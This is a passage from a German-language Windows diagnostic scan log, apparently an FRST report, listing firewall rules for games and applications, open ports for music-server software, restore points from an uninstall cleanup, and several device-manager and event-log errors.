(x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [UDP Query User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [UDP Query User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe FirewallRules: [{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445 FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445 FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{CBC3E334-A8AA-4AA9-8952-0DDC79CEEFC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI) DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI) DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI) DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI) DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI) DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI) DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI) DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI) DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI) DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI) DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI) DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI) DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI) DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI) DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI) DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp DomainProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI) StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI) StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI) StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI) StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI) StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI) StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI) StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI) StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI) StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI) StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI) StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI) StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI) StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI) StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI) StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp ==================== Wiederherstellungspunkte ========================= 31-07-2017 01:36:50 Removed simplitec simplicheck 01-08-2017 12:29:49 Malwarebytes Anti-Rootkit Restore Point 05-08-2017 22:59:27 Revo Uninstaller's restore point - Adobe Acrobat Reader DC - Deutsch 05-08-2017 23:02:31 Revo Uninstaller's restore point - 7-Zip 9.20 (x64 edition) 05-08-2017 23:03:57 Revo Uninstaller's restore point - Avira Antivirus 05-08-2017 23:06:04 Revo Uninstaller's restore point - Advanced SystemCare 10 05-08-2017 23:11:19 Revo Uninstaller's restore point - Avira System Speedup 05-08-2017 23:12:26 Revo Uninstaller's restore point - Batman: Arkham City GOTY 05-08-2017 23:13:06 Revo Uninstaller's restore point - Avira Software Updater 05-08-2017 23:13:13 Removed Avira Software Updater 05-08-2017 23:13:50 Revo Uninstaller's restore point - Avira Connect 05-08-2017 23:14:16 Revo Uninstaller's restore point - Avira Phantom VPN 05-08-2017 23:14:52 Revo Uninstaller's restore point - Avira Connect 05-08-2017 23:15:50 Revo Uninstaller's restore point - Deus Ex: Mankind Divided™ 05-08-2017 23:16:28 Revo Uninstaller's restore point - Dying Light 05-08-2017 23:16:56 Revo Uninstaller's restore point - Fallout: New Vegas 05-08-2017 23:17:21 Revo Uninstaller's restore point - Driver Booster 4.5 05-08-2017 23:17:55 Revo Uninstaller's restore point - Command & Conquer™ Red Alert 2 and Yuri’s Revenge 05-08-2017 23:18:51 Revo Uninstaller's restore point - Mozilla Firefox 54.0.1 (x86 de) 05-08-2017 23:19:55 Revo Uninstaller's restore point - System Shock 2 05-08-2017 23:20:31 Revo Uninstaller's restore point - Smart Defrag 5 05-08-2017 23:22:02 Revo Uninstaller's restore point - Metro: Last Light 05-08-2017 23:22:32 Revo Uninstaller's restore point - Futuremark SystemInfo 05-08-2017 23:22:38 Removed Futuremark SystemInfo 05-08-2017 23:23:32 Revo Uninstaller's restore point - The Banner Saga 2 05-08-2017 23:24:33 Revo Uninstaller's restore point - State of Decay 05-08-2017 23:25:37 Revo Uninstaller's restore point - 3DMark 05-08-2017 23:27:30 Revo Uninstaller's restore point - State of Decay 05-08-2017 23:28:01 Revo Uninstaller's restore point - WestwoodOnline 05-08-2017 23:28:29 Revo Uninstaller's restore point - WestwoodOnline 05-08-2017 23:29:30 Revo Uninstaller's restore point - Skype Click to Call 05-08-2017 23:30:19 Revo Uninstaller's restore point - Skype Click to Call 05-08-2017 23:41:58 Revo Uninstaller's restore point - Jade Empire 06-08-2017 00:18:38 Revo Uninstaller's restore point - Free Studio 06-08-2017 00:19:24 Revo Uninstaller's restore point - IObit Uninstaller 06-08-2017 00:31:22 Revo Uninstaller's restore point - Free Studio 06-08-2017 00:33:21 Revo Uninstaller's restore point - Trojan Remover 06-08-2017 00:59:33 Revo Uninstaller's restore point - GNU Image Manipulation Program ==================== Fehlerhafte Geräte im Gerätemanager ============= Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.) Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.) Class Guid: {36fc9e60-c465-11cf-8056-444553540000} Manufacturer: (Standard-USB-Hostcontroller) Service: Problem: : Windows has stopped this device because it has reported problems. (Code 43) Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (08/06/2017 12:59:33 AM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {2b4a2dd8-1805-4ac5-9545-b2b4e5183952} Error: (08/06/2017 12:54:05 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/06/2017 12:53:54 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/06/2017 12:33:21 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer". Details: AddWin32ServiceFiles: Unable to back up image of service IObitUnSvr since QueryServiceConfig API failed System Error: Das System kann die angegebene Datei nicht finden. . Error: (08/06/2017 12:33:21 AM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {aed6dc58-88ad-4623-913e-10f437d01ec2} Error: (08/06/2017 12:31:23 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer". Details: AddWin32ServiceFiles: Unable to back up image of service IObitUnSvr since QueryServiceConfig API failed System Error: Das System kann die angegebene Datei nicht finden. . Error: (08/06/2017 12:31:21 AM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {aed6dc58-88ad-4623-913e-10f437d01ec2} Error: (08/06/2017 12:23:06 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: 